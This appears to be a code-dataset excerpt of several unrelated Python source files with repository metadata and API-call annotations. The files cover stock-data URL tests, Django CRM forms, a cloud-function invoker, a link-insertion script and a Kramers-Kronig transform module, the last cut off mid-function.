| [((27, 5, 27, 36), 're.compile', 're.compile', ({(27, 16, 27, 35): '"""\\\\${(?P<key>.*?)}"""'}, {}), "('\\\\${(?P<key>.*?)}')", False, 'import re\n'), ((28, 8, 30, 1), 're.compile', 're.compile', ({(29, 4, 29, 46): '"""(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]"""'}, {}), "('(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]')", False, 'import re\n'), ((31, 12, 33, 1), 're.compile', 're.compile', ({(32, 4, 32, 66): '"""(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]ELSE (?P<iffalse>.*)"""'}, {}), "('(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]ELSE (?P<iffalse>.*)')", False, 'import re\n'), ((39, 4, 39, 25), 'sys.stdout.write', 'sys.stdout.write', ({(39, 21, 39, 24): 'msg'}, {}), '(msg)', False, 'import sys\n'), ((153, 11, 153, 24), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((246, 14, 246, 55), 'excentury.command.import_mod', 'import_mod', ({(246, 25, 246, 54): "'excentury.command.%s' % name"}, {}), "('excentury.command.%s' % name)", False, 'from excentury.command import error, trace, import_mod\n'), ((84, 39, 84, 60), 'textwrap.dedent', 'textwrap.dedent', ({(84, 55, 84, 59): 'DESC'}, {}), '(DESC)', False, 'import textwrap\n'), ((143, 8, 147, 9), 'excentury.command.trace', 'trace', ({(144, 12, 146, 13): "('WARNING: error in line %d of %r: %s\\n' % (line_num, fname, exception.message)\n )"}, {}), "('WARNING: error in line %d of %r: %s\\n' % (line_num, fname, exception\n .message))", False, 'from excentury.command import error, trace, import_mod\n'), ((201, 27, 201, 56), 'os.path.exists', 'os.path.exists', ({(201, 42, 201, 55): '"""xcpp.config"""'}, {}), "('xcpp.config')", False, 'import os\n'), ((204, 15, 204, 58), 'os.path.exists', 'os.path.exists', ({(204, 30, 204, 57): "('%s/xcpp.config' % tmp_path)"}, {}), "('%s/xcpp.config' % tmp_path)", False, 'import os\n'), ((207, 13, 207, 52), 'os.path.exists', 'os.path.exists', ({(207, 28, 207, 51): "('%s/xcpp.config' % path)"}, {}), "('%s/xcpp.config' % path)", False, 'import os\n'), ((208, 8, 208, 62), 'excentury.command.error', 'error', ({(208, 14, 208, 61): "('ERROR: %s/xcpp.config does not exist\\n' % path)"}, {}), "('ERROR: %s/xcpp.config does not exist\\n' % path)", False, 'from excentury.command import error, trace, import_mod\n'), ((213, 17, 213, 30), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((232, 8, 232, 67), 'excentury.command.error', 'error', ({(232, 14, 232, 66): '("ERROR: \'%s\' is not of the form sec.key\\n" % arg.var)'}, {}), '("ERROR: \'%s\' is not of the form sec.key\\n" % arg.var)', False, 'from excentury.command import error, trace, import_mod\n'), ((256, 29, 256, 52), 'os.path.expandvars', 'os.path.expandvars', ({(256, 48, 256, 51): 'val'}, {}), '(val)', False, 'import os\n'), ((277, 31, 277, 54), 'os.path.expandvars', 'os.path.expandvars', ({(277, 50, 277, 53): 'val'}, {}), '(val)', False, 'import os\n'), ((49, 35, 49, 47), 're.escape', 're.escape', ({(49, 45, 49, 46): 'k'}, {}), '(k)', False, 'import re\n'), ((161, 28, 161, 41), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((205, 16, 205, 71), 'excentury.command.trace', 'trace', ({(205, 22, 205, 70): '("Configured with: \'%s/xcpp.config\'\\n" % tmp_path)'}, {}), '("Configured with: \'%s/xcpp.config\'\\n" % tmp_path)', False, 'from excentury.command import error, trace, import_mod\n'), ((249, 33, 249, 56), 'os.path.expandvars', 'os.path.expandvars', ({(249, 52, 249, 55): 'val'}, {}), '(val)', False, 'import os\n'), ((166, 22, 166, 45), 'os.path.expandvars', 'os.path.expandvars', ({(166, 41, 166, 44): 'val'}, {}), '(val)', False, 'import os\n')]
pkjmesra/nseta | tests/test_urls.py | 28cd8cede465efe9f506a38c5933602c463e5185 | # -*- coding: utf-8 -*-
'''
Created on Thu Nov 19 20:52:33 2015
@author: SW274998
'''
from nseta.common.commons import *
import datetime
import unittest
import time
from bs4 import BeautifulSoup
from tests import htmls
import json
import requests
import six
from nseta.common.urls import *
import nseta.common.urls as urls
from six.moves.urllib.parse import urlparse
from baseUnitTest import baseUnitTest
class TestUrls(baseUnitTest):
def setUp(self, redirect_logs=True):
super().setUp()
proxy_on = False
if proxy_on:
urls.session.proxies.update({'http': 'proxy1.wipro.com:8080'})
def runTest(self):
for key in TestUrls.__dict__.keys():
if key.find('test') == 0:
TestUrls.__dict__[key](self)
def test_get_symbol_count(self):
count = get_symbol_count(symbol='SBIN')
self.assertEqual(count, '1')
force_count = get_symbol_count(symbol='SBIN', force_refresh=True)
self.assertEqual(force_count, '1')
def test_equity_history_url(self):
sym_count = get_symbol_count(symbol='SBIN')
txt = 'Data for SBIN - EQ'
resp = equity_history_url(symbol='SBIN',
symbolCount=sym_count,
series='EQ',
fromDate='01-01-2000',
toDate='10-01-2000',
dateRange='')
self.assertGreaterEqual(resp.text.find(txt), 0, resp.text)
def test_nse_intraday_url(self):
txt = 'date|g1_o|g1_h|g1_l|g1_c|g2|g2_CUMVOL' #'<columns><column>date</column><column>pltp</column><column>nltp</column><column>previousclose</column><column>allltp</column>'
resp = nse_intraday_url(CDSymbol='SBIN', Periodicity='1')
self.assertIn(txt, resp.text)
def test_price_list_url(self):
resp = price_list_url('2019', 'DEC', '31DEC2019')
csv = unzip_str(resp.content)
self.assertGreaterEqual(csv.find('SBIN'), 0)
def tests_daily_volatility_url(self):
resp = daily_volatility_url('19112015')
self.assertGreaterEqual(resp.text.find('SBIN'), 0)
def test_pr_price_list_zipped_url(self):
resp = pr_price_list_zipped_url('191115')
csv = unzip_str(resp.content)
def test_index_history_url(self):
resp = index_history_url(indexType='NIFTY 50',
fromDate='01-01-2015',
toDate='10-01-2015')
self.assertGreaterEqual(resp.text.find('High'), 0)
self.assertGreaterEqual(resp.text.find('Low'), 0)
def test_index_daily_snapshot_url(self):
resp = index_daily_snapshot_url('06012020')
csv = str(resp.content)
self.assertGreaterEqual(csv.find('Nifty 50'), 0)
self.assertGreaterEqual(csv.find('Nifty IT'), 0)
self.assertGreaterEqual(csv.find('Nifty Bank'), 0)
self.assertGreaterEqual(csv.find('Nifty Next 50'), 0)
def test_index_pe_history_url(self):
resp = index_pe_history_url(fromDate='01-01-2015',
toDate='10-01-2015',
indexName='NIFTY 50')
self.assertGreaterEqual(resp.text.find('<th>P/E'), 0)
self.assertGreaterEqual(resp.text.find('<th>P/B'), 0)
def test_index_vix_history_url(self):
resp = index_vix_history_url(fromDate='01-Jan-2015',
toDate='10-Jan-2015',
)
self.assertGreaterEqual(resp.text.find('VIX'), 0)
self.assertGreaterEqual(resp.text.find('Change'), 0)
def test_derivative_derivative_expiry_dates_url(self):
resp = derivative_expiry_dates_url()
self.assertGreaterEqual(resp.text.find('vixExpryDt'), 0)
def test_derivative_history_url(self):
resp = derivative_history_url(instrumentType='FUTIDX',
symbol='NIFTY',
expiryDate='26-12-2019',
optionType='select',
strikePrice='',
dateRange='',
fromDate='25-Dec-2019',
toDate='26-Dec-2019')
self.assertGreaterEqual(resp.text.find('NIFTY'), 0)
self.assertGreaterEqual(resp.text.find('Expiry'), 0)
def test_derivative_price_list_url(self):
resp = derivative_price_list_url('2019', 'JUL', '19JUL2019')
csv = unzip_str(resp.content)
def tearDown(self):
super().tearDown()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestUrls)
result = unittest.TextTestRunner(verbosity=2).run(suite)
if six.PY2:
if result.wasSuccessful():
print('tests OK')
for (test, error) in result.errors:
print('=========Error in: %s===========' % test)
print(error)
print('======================================')
for (test, failures) in result.failures:
print('=========Error in: %s===========' % test)
print(failures)
print('======================================')
| [((27, 6, 27, 68), 'nseta.common.urls.session.proxies.update', 'urls.session.proxies.update', ({(27, 34, 27, 67): "{'http': 'proxy1.wipro.com:8080'}"}, {}), "({'http': 'proxy1.wipro.com:8080'})", True, 'import nseta.common.urls as urls\n'), ((123, 10, 123, 31), 'unittest.TestLoader', 'unittest.TestLoader', ({}, {}), '()', False, 'import unittest\n'), ((124, 11, 124, 47), 'unittest.TextTestRunner', 'unittest.TextTestRunner', (), '', False, 'import unittest\n')] |
cheradenine/Django-CRM | accounts/forms.py | 692572ced050d314c1f880af8b4000c97cbf7440 | from django import forms
from .models import Account
from common.models import Comment, Attachments
from leads.models import Lead
from contacts.models import Contact
from django.db.models import Q
class AccountForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
account_view = kwargs.pop('account', False)
request_user = kwargs.pop('request_user', None)
super(AccountForm, self).__init__(*args, **kwargs)
for field in self.fields.values():
field.widget.attrs = {"class": "form-control"}
self.fields['description'].widget.attrs.update({'rows': '8'})
self.fields['status'].choices = [
(each[0], each[1]) for each in Account.ACCOUNT_STATUS_CHOICE]
self.fields['status'].required = False
for key, value in self.fields.items():
if key == 'phone':
value.widget.attrs['placeholder'] = "+91-123-456-7890"
else:
value.widget.attrs['placeholder'] = value.label
self.fields['billing_address_line'].widget.attrs.update({
'placeholder': 'Address Line'})
self.fields['billing_street'].widget.attrs.update({
'placeholder': 'Street'})
self.fields['billing_city'].widget.attrs.update({
'placeholder': 'City'})
self.fields['billing_state'].widget.attrs.update({
'placeholder': 'State'})
self.fields['billing_postcode'].widget.attrs.update({
'placeholder': 'Postcode'})
self.fields["billing_country"].choices = [
("", "--Country--"), ] + list(self.fields["billing_country"].choices)[1:]
self.fields["lead"].queryset = Lead.objects.all(
).exclude(status='closed')
if request_user:
self.fields["lead"].queryset = Lead.objects.filter(
Q(assigned_to__in=[request_user]) | Q(created_by=request_user)).exclude(status='closed')
self.fields["contacts"].queryset = Contact.objects.filter(
Q(assigned_to__in=[request_user]) | Q(created_by=request_user))
if account_view:
self.fields['billing_address_line'].required = True
self.fields['billing_street'].required = True
self.fields['billing_city'].required = True
self.fields['billing_state'].required = True
self.fields['billing_postcode'].required = True
self.fields['billing_country'].required = True
class Meta:
model = Account
fields = ('name', 'phone', 'email', 'website', 'industry',
'description', 'status',
'billing_address_line', 'billing_street',
'billing_city', 'billing_state',
'billing_postcode', 'billing_country', 'lead', 'contacts')
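# Illustrative view-side sketch (assumed usage, not from the original source):
#
#   form = AccountForm(request.POST, account=True, request_user=request.user)
#   if form.is_valid():
#       form.save()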
class AccountCommentForm(forms.ModelForm):
comment = forms.CharField(max_length=64, required=True)
class Meta:
model = Comment
fields = ('comment', 'account', 'commented_by')
class AccountAttachmentForm(forms.ModelForm):
attachment = forms.FileField(max_length=1001, required=True)
class Meta:
model = Attachments
fields = ('attachment', 'account')
| [((65, 14, 65, 59), 'django.forms.CharField', 'forms.CharField', (), '', False, 'from django import forms\n'), ((73, 17, 73, 64), 'django.forms.FileField', 'forms.FileField', (), '', False, 'from django import forms\n'), ((39, 39, 40, 9), 'leads.models.Lead.objects.all', 'Lead.objects.all', ({}, {}), '()', False, 'from leads.models import Lead\n'), ((45, 16, 45, 49), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((45, 52, 45, 78), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((43, 16, 43, 49), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((43, 52, 43, 78), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n')] |
thetolga/pywren-ibm-cloud | pywren/pywren_ibm_cloud/invokers.py | ce48c158cf469b55100ab68a75d3dcd6ae9a3ffe | #
# Copyright 2018 PyWren Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import logging
import random
from pywren_ibm_cloud.cf_connector import CloudFunctions
logger = logging.getLogger(__name__)
class IBMCloudFunctionsInvoker:
def __init__(self, cf_config, retry_config):
self.namespace = cf_config['namespace']
self.endpoint = cf_config['endpoint']
self.cf_action_name = cf_config['action_name'] # Runtime
self.invocation_retry = retry_config['invocation_retry']
self.retry_sleeps = retry_config['retry_sleeps']
self.retries = retry_config['retries']
self.client = CloudFunctions(cf_config)
log_msg = 'IBM Cloud Functions init for {}'.format(self.cf_action_name)
logger.info(log_msg)
if(logger.getEffectiveLevel() == logging.WARNING):
print(log_msg)
def invoke(self, payload):
"""
Invoke -- return information about this invocation
"""
act_id = self.client.invoke(self.cf_action_name, payload)
attempts = 1
while not act_id and self.invocation_retry and attempts < self.retries:
attempts += 1
selected_sleep = random.choice(self.retry_sleeps)
exec_id = payload['executor_id']
call_id = payload['call_id']
log_msg = ('Executor ID {} Function {} - Invocation failed - retry {} in {} seconds'.format(exec_id, call_id, attempts, selected_sleep))
logger.debug(log_msg)
time.sleep(selected_sleep)
act_id = self.client.invoke(self.cf_action_name, payload)
return act_id
def config(self):
"""
Return config dict
"""
return {'cf_action_name': self.cf_action_name,
'cf_namespace': self.namespace,
'cf_endpoint': self.endpoint}
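# Illustrative usage sketch (hypothetical configuration values, not from the
# original source; cf_config must also hold whatever credentials
# CloudFunctions expects):
#
#   invoker = IBMCloudFunctionsInvoker(
#       {'namespace': 'my_ns', 'endpoint': 'https://example.functions.cloud.ibm.com',
#        'action_name': 'pywren_runtime'},
#       {'invocation_retry': True, 'retry_sleeps': [1, 2, 5], 'retries': 3})
#   activation_id = invoker.invoke({'executor_id': '0', 'call_id': '00000'})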
| [((22, 9, 22, 36), 'logging.getLogger', 'logging.getLogger', ({(22, 27, 22, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((34, 22, 34, 47), 'pywren_ibm_cloud.cf_connector.CloudFunctions', 'CloudFunctions', ({(34, 37, 34, 46): 'cf_config'}, {}), '(cf_config)', False, 'from pywren_ibm_cloud.cf_connector import CloudFunctions\n'), ((50, 29, 50, 61), 'random.choice', 'random.choice', ({(50, 43, 50, 60): 'self.retry_sleeps'}, {}), '(self.retry_sleeps)', False, 'import random\n'), ((57, 12, 57, 38), 'time.sleep', 'time.sleep', ({(57, 23, 57, 37): 'selected_sleep'}, {}), '(selected_sleep)', False, 'import time\n')] |
Arugakente/DataScienceP1 | Projet1/Dataset/addlinkRealExample.py | 94ca874ed8a76a89a3da9ecf2fe6e554700f0507 | import os
import random
inputDirectory = "./original"
outputDirectory = "./processed"
#probability parameters
TopLevel = 0.6
SecondLevel = 0.5
ThirdLevel = 0.4
FourAndAbove = 0.2
pickInside = 0.5
pickOutside = 0.25
topics = []
siteLevel = []
fileStructure = []
count = 0
def findPossibleIndex(toParse):
toReturn = []
for current in range(0,len(toParse)):
if toParse[current] == " ":
toReturn.append(current)
toReturn.append(len(toParse))
return toReturn
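# e.g. findPossibleIndex("a b c") returns [1, 3, 5]: every space position plus
# the end of the string is a candidate insertion point for a link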
def manageFile(inputPath,outputPath,topicIndex,currentLevel,filename):
count = 0
content = open(inputPath , 'r')
output = open(outputPath ,"w")
currentLine = content.readline()
outputFile = ""
    while currentLine:
randomPick = random.uniform(0.0,2.0)
if randomPick <= pickInside+pickOutside :
possibleIndexes = findPossibleIndex(currentLine)
insertPosition = possibleIndexes[random.randint(0,len(possibleIndexes)-1)]
selectedTopic = topicIndex
if(randomPick<=pickOutside):
while(selectedTopic == topicIndex):
selectedTopic = random.randint(0,len(topics)-1)
randomPick = random.uniform(0.0,4.0)
if(randomPick <= TopLevel + SecondLevel + ThirdLevel + FourAndAbove):
selectedLevel = 0
if(randomPick <= TopLevel):
selectedLevel = 1
if(randomPick <= TopLevel+ SecondLevel and randomPick > TopLevel):
selectedLevel = 2
if(randomPick <= TopLevel + SecondLevel + ThirdLevel and randomPick > TopLevel+ SecondLevel):
selectedLevel = 3
if(randomPick <= TopLevel + SecondLevel + ThirdLevel + FourAndAbove and randomPick > TopLevel + SecondLevel + ThirdLevel):
if(len(siteLevel[selectedTopic]) == 4):
selectedLevel = 4
else:
selectedLevel = random.randint(4,len(siteLevel[selectedTopic]))
i = 0
found = False
while i<len(siteLevel[selectedTopic]):
if siteLevel[selectedTopic][i] == str(selectedLevel)+"grade":
found = True
selectedLevel = i
i+=1
if(selectedLevel>=currentLevel):
fileLink = filename
while(fileLink == filename):
fileLink = fileStructure[selectedTopic][selectedLevel][random.randint(0,len(fileStructure[selectedTopic][selectedLevel])-1)]
fileLink = " linkTo:"+fileLink
count += 1
print(count)
if insertPosition == len(currentLine):
currentLine += fileLink
else:
currentLine = currentLine[0:insertPosition]+fileLink+currentLine[insertPosition:]
        outputFile += currentLine
        currentLine = content.readline()
    output.write(outputFile)
    content.close()
    output.close()
    return count
topicIndex=0
for foldername in os.listdir(inputDirectory) :
if(foldername[0] != "."):
topics.append(foldername)
siteLevel.append([])
fileStructure.append([])
levelIndex=0
for categoryName in os.listdir(inputDirectory+"/"+foldername):
if(categoryName[0] != "."):
siteLevel[topicIndex].append(categoryName)
fileStructure[topicIndex].append([])
for filename in os.listdir(inputDirectory+"/"+foldername+"/"+categoryName):
if(filename[0] != "."):
fileStructure[topicIndex][levelIndex].append(filename)
levelIndex += 1
topicIndex += 1
for i in range(0,len(topics)):
for j in range(0,len(siteLevel[i])):
for k in range(0,len(fileStructure[i][j])):
count += manageFile(inputDirectory+"/"+topics[i]+"/"+siteLevel[i][j]+"/"+fileStructure[i][j][k],outputDirectory+"/"+fileStructure[i][j][k],i,j,fileStructure[i][j][k])
print(str(count)+" liens créés") | [((94, 18, 94, 44), 'os.listdir', 'os.listdir', ({(94, 29, 94, 43): 'inputDirectory'}, {}), '(inputDirectory)', False, 'import os\n'), ((41, 21, 41, 44), 'random.uniform', 'random.uniform', ({(41, 36, 41, 39): '0.0', (41, 40, 41, 43): '2.0'}, {}), '(0.0, 2.0)', False, 'import random\n'), ((104, 28, 104, 69), 'os.listdir', 'os.listdir', ({(104, 39, 104, 68): "(inputDirectory + '/' + foldername)"}, {}), "(inputDirectory + '/' + foldername)", False, 'import os\n'), ((52, 25, 52, 48), 'random.uniform', 'random.uniform', ({(52, 40, 52, 43): '0.0', (52, 44, 52, 47): '4.0'}, {}), '(0.0, 4.0)', False, 'import random\n'), ((110, 32, 110, 90), 'os.listdir', 'os.listdir', ({(110, 43, 110, 89): "(inputDirectory + '/' + foldername + '/' + categoryName)"}, {}), "(inputDirectory + '/' + foldername + '/' + categoryName)", False, 'import os\n')] |
benajamin/kkcalc | kkcalc/kk.py | fcabfba288442dd297e3bd9910062c5db2231a91 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Kramers-Kronig Calculator software package.
#
# Copyright (c) 2013 Benjamin Watts, Daniel J. Lauk
#
# The software is licensed under the terms of the zlib/libpng license.
# For details see LICENSE.txt
"""This module implements the Kramers-Kronig transformation."""
import logging, sys
logger = logging.getLogger(__name__)
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
import math
import numpy
import os
import data
def calc_relativistic_correction(stoichiometry):
"""Calculate the relativistic correction to the Kramers-Kronig transform.
Parameters:
-----------
stoichiometry : array of integer/float pairs
Each pair in the list consists of an atomic number and the relative proportion of that element.
Returns
-------
This function returns a ``float`` holding the relativistic
    correction to the Kramers-Kronig transform.
"""
correction = 0
for z, n in stoichiometry:
correction += (z - (z/82.5)**2.37) * n
return correction
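# For example, water (H2O) corresponds to stoichiometry [(1, 2), (8, 1)]:
#   calc_relativistic_correction([(1, 2), (8, 1)])  # approximately 9.996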
def KK_General_PP(Eval_Energy, Energy, imaginary_spectrum, orders, relativistic_correction):
"""Calculate Kramers-Kronig transform with "Piecewise Polynomial"
algorithm plus the Biggs and Lighthill extended data.
Parameters
----------
Eval_Energy : numpy vector of `float`
Set of photon energies describing points at which to evaluate the real spectrum
Energy : numpy vector of `float`
Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid
imaginary_spectrum : two-dimensional `numpy.array` of `float`
The array consists of columns of polynomial coefficients belonging to the power terms indicated by 'order'
orders : numpy vector of integers
The vector represents the polynomial indices corresponding to the columns of imaginary_spectrum
relativistic_correction : float
The relativistic correction to the Kramers-Kronig transform.
You can calculate the value using the `calc_relativistic_correction` function.
Returns
-------
This function returns the real part of the scattering factors evaluated at photon energies specified by Eval_Energy.
"""
logger = logging.getLogger(__name__)
logger.info("Calculate Kramers-Kronig transform using general piecewise-polynomial algorithm")
# Need to build x-E-n arrays
X = numpy.tile(Energy[:,numpy.newaxis,numpy.newaxis],(1,len(Eval_Energy),len(orders)))
E = numpy.tile(Eval_Energy[numpy.newaxis,:,numpy.newaxis],(len(Energy)-1,1,len(orders)))
C = numpy.tile(imaginary_spectrum[:,numpy.newaxis,:],(1,len(Eval_Energy),1))
N = numpy.tile(orders[numpy.newaxis,numpy.newaxis,:],(len(Energy)-1,len(Eval_Energy),1))
poles = numpy.equal(X,numpy.tile(Eval_Energy[numpy.newaxis,:,numpy.newaxis],(len(Energy),1,len(orders))))
# all N, ln(x+E) and ln(x-E) terms and poles
Integral = numpy.sum(-C*(-E)**N*numpy.log(numpy.absolute((X[1:,:,:]+E)/(X[:-1,:,:]+E)))-C*E**N*(1-poles[1:,:,:])*numpy.log(numpy.absolute((X[1:,:,:]-E+poles[1:,:,:])/((1-poles[:-1,:,:])*X[:-1,:,:]+poles[:-1,:,:]*X[[0]+list(range(len(Energy)-2)),:,:]-E))),axis=(0,2))
if numpy.any(orders<=-2): # N<=-2, ln(x) terms
i = [slice(None,None,None),slice(None,None,None),orders<=-2]
Integral += numpy.sum(C[i]*((-E[i])**N[i]+E[i]**N[i])*numpy.log(numpy.absolute((X[1:,:,orders<=-2])/(X[:-1,:,orders<=-2]))),axis=(0,2))
if numpy.any(orders>=0): # N>=0, x^k terms
for ni in numpy.where(orders>=0)[0]:
i = [slice(None,None,None),slice(None,None,None),ni]
n = orders[ni]
for k in range(n,0,-2):
Integral += numpy.sum(C[i]/float(-k)*2*E[i]**(n-k)*(X[1:,:,ni]**k-X[:-1,:,ni]**k),axis=0)
if numpy.any(orders <=-3): # N<=-3, x^k terms
for ni in numpy.where(orders<=-3)[0]:
i = [slice(None,None,None),slice(None,None,None),ni]
n = orders[ni]
for k in range(n+2,0,2):
Integral += numpy.sum(C[i]/float(k)*((-1)**(n-k)+1)*E[i]**(n-k)*(X[1:,:,ni]**k-X[:-1,:,ni]**k),axis=0)
logger.debug("Done!")
return Integral / math.pi + relativistic_correction
def KK_PP(Eval_Energy, Energy, imaginary_spectrum, relativistic_correction):
"""Calculate Kramers-Kronig transform with "Piecewise Polynomial"
algorithm plus the Biggs and Lighthill extended data.
Parameters
----------
Eval_Energy : numpy vector of `float`
Set of photon energies describing points at which to evaluate the real spectrum
Energy : numpy vector of `float`
Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid
imaginary_spectrum : two-dimensional `numpy.array` of `float`
The array consists of five columns of polynomial coefficients: A_1, A_0, A_-1, A_-2, A_-3
relativistic_correction : float
The relativistic correction to the Kramers-Kronig transform.
You can calculate the value using the `calc_relativistic_correction` function.
Returns
-------
This function returns the real part of the scattering factors evaluated at photon energies specified by Eval_Energy.
"""
logger = logging.getLogger(__name__)
logger.info("Calculate Kramers-Kronig transform using (n from 1 to -3) piecewise-polynomial algorithm")
X1 = Energy[0:-1]
X2 = Energy[1:]
E = numpy.tile(Eval_Energy, (len(Energy)-1, 1)).T
Full_coeffs = imaginary_spectrum.T
Symb_1 = (( Full_coeffs[0, :]*E+Full_coeffs[1, :])*(X2-X1)+0.5*Full_coeffs[0, :]*(X2**2-X1**2)-(Full_coeffs[3, :]/E+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute(X2/X1))+Full_coeffs[4, :]/E*(X2**-1-X1**-1))
Symb_2 = ((-Full_coeffs[0, :]*E+Full_coeffs[1, :])*(X2-X1)+0.5*Full_coeffs[0, :]*(X2**2-X1**2)+(Full_coeffs[3, :]/E-Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute(X2/X1))-Full_coeffs[4, :]/E*(X2**-1-X1**-1))+(Full_coeffs[0, :]*E**2-Full_coeffs[1, :]*E+Full_coeffs[2, :]-Full_coeffs[3, :]*E**-1+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute((X2+E)/(X1+E)))
Symb_3 = (1-1*((X2==E)|(X1==E)))*(Full_coeffs[0, :]*E**2+Full_coeffs[1, :]*E+Full_coeffs[2, :]+Full_coeffs[3, :]*E**-1+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute((X2-E+1*(X2==E))/(X1-E+1*(X1==E))))
Symb_B = numpy.sum(Symb_2 - Symb_1 - Symb_3, axis=1) # Sum areas for approximate integral
# Patch singularities
hits = Energy[1:-1]==E[:,0:-1]
E_hits = numpy.append(numpy.insert(numpy.any(hits, axis=0),[0,0],False),[False,False])
Eval_hits = numpy.any(hits, axis=1)
X1 = Energy[E_hits[2:]]
XE = Energy[E_hits[1:-1]]
X2 = Energy[E_hits[:-2]]
C1 = Full_coeffs[:, E_hits[2:-1]]
C2 = Full_coeffs[:, E_hits[1:-2]]
Symb_singularities = numpy.zeros(len(Eval_Energy))
Symb_singularities[Eval_hits] = (C2[0, :]*XE**2+C2[1, :]*XE+C2[2, :]+C2[3, :]*XE**-1+C2[4, :]*XE**-2)*numpy.log(numpy.absolute((X2-XE)/(X1-XE)))
# Finish things off
KK_Re = (Symb_B-Symb_singularities) / (math.pi*Eval_Energy) + relativistic_correction
logger.debug("Done!")
return KK_Re
def improve_accuracy(Full_E, Real_Spectrum, Imaginary_Spectrum, relativistic_correction, tolerance, recursion=50):
"""Calculate extra data points so that a linear interpolation is more accurate.
Parameters
----------
Full_E : numpy vector of `float`
Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid
Real_Spectrum : numpy vector of `float`
The real part of the spectrum corresponding to magnitudes at photon energies in Full_E
Imaginary_Spectrum : two-dimensional `numpy.array` of `float`
The array consists of five columns of polynomial coefficients: A_1, A_0, A_-1, A_-2, A_-3
relativistic_correction : float
The relativistic correction to the Kramers-Kronig transform.
(You can calculate the value using the `calc_relativistic_correction` function.)
tolerance : float
		Level of error in linear interpolation of data values to be allowed.
recursion : integer
Number of times an energy interval can be halved before giving up.
Returns
-------
This function returns a numpy array with three columns respectively representing photon energy, the real spectrum and the imaginary spectrum.
"""
logger.debug("Improve data accuracy")
new_points = numpy.cumsum(numpy.ones((len(Full_E)-2,1),dtype=numpy.int8))+1
Im_values = data.coeffs_to_ASF(Full_E, numpy.vstack((Imaginary_Spectrum,Imaginary_Spectrum[-1])))
#plot_Im_values = Im_values
Re_values = Real_Spectrum
E_values = Full_E
temp_Im_spectrum = Imaginary_Spectrum[1:]
count = 0
improved = 1
total_improved_points = 0
while count<recursion and numpy.sum(improved)>0:
#get E_midpoints
midpoints = (E_values[new_points-1]+E_values[new_points])/2.
#evaluate at new points
Im_midpoints = data.coeffs_to_ASF(midpoints, temp_Im_spectrum)
Re_midpoints = KK_PP(midpoints, Full_E, Imaginary_Spectrum, relativistic_correction)
#evaluate error levels
Im_error = abs((Im_values[new_points-1]+Im_values[new_points])/2. - Im_midpoints)
Re_error = abs((Re_values[new_points-1]+Re_values[new_points])/2. - Re_midpoints)
improved = (Im_error>tolerance) | (Re_error>tolerance)
logger.debug(str(numpy.sum(improved))+" points (out of "+str(len(improved))+") can be improved in pass number "+str(count+1)+".")
total_improved_points += numpy.sum(improved)
#insert new points and values
Im_values = numpy.insert(Im_values,new_points[improved],Im_midpoints[improved])
Re_values = numpy.insert(Re_values,new_points[improved],Re_midpoints[improved])
E_values = numpy.insert(E_values,new_points[improved],midpoints[improved])
#prepare for next loop
temp_Im_spectrum =numpy.repeat(temp_Im_spectrum[improved],2,axis=0)
new_points = numpy.where(numpy.insert(numpy.zeros(Im_values.shape, dtype=numpy.bool),new_points[improved],True))[0]
new_points = numpy.vstack((new_points, new_points+1)).T.flatten()
count += 1
#import matplotlib
#matplotlib.use('WXAgg')
#import pylab
#pylab.figure()
#pylab.plot(Full_E,plot_Im_values,'ok')
#pylab.plot(Full_E,Real_Spectrum,'og')
#pylab.plot(midpoints,Im_midpoints,'+b')
#pylab.plot(midpoints,Re_midpoints,'+r')
#pylab.plot(E_values,Im_values,'b-')
#pylab.plot(E_values,Re_values,'r-')
#pylab.plot(midpoints,Im_error,'b-')
#pylab.plot(midpoints,Re_error,'r-')
#pylab.xscale('log')
#pylab.show()
logger.info("Improved data accuracy by inserting "+str(total_improved_points)+" extra points.")
return numpy.vstack((E_values,Re_values,Im_values)).T
def kk_calculate_real(NearEdgeDataFile, ChemicalFormula, load_options=None, input_data_type=None, merge_points=None, add_background=False, fix_distortions=False, curve_tolerance=None, curve_recursion=50):
"""Do all data loading and processing and then calculate the kramers-Kronig transform.
Parameters
----------
NearEdgeDataFile : string
		Path to file containing near-edge data
ChemicalFormula : string
A standard chemical formula string consisting of element symbols, numbers and parentheses.
merge_points : list or tuple pair of `float` values, or None
The photon energy values (low, high) at which the near-edge and scattering factor data values
are set equal so as to ensure continuity of the merged data set.
Returns
-------
This function returns a numpy array with columns consisting of the photon energy, the real and the imaginary parts of the scattering factors.
"""
Stoichiometry = data.ParseChemicalFormula(ChemicalFormula)
Relativistic_Correction = calc_relativistic_correction(Stoichiometry)
Full_E, Imaginary_Spectrum = data.calculate_asf(Stoichiometry)
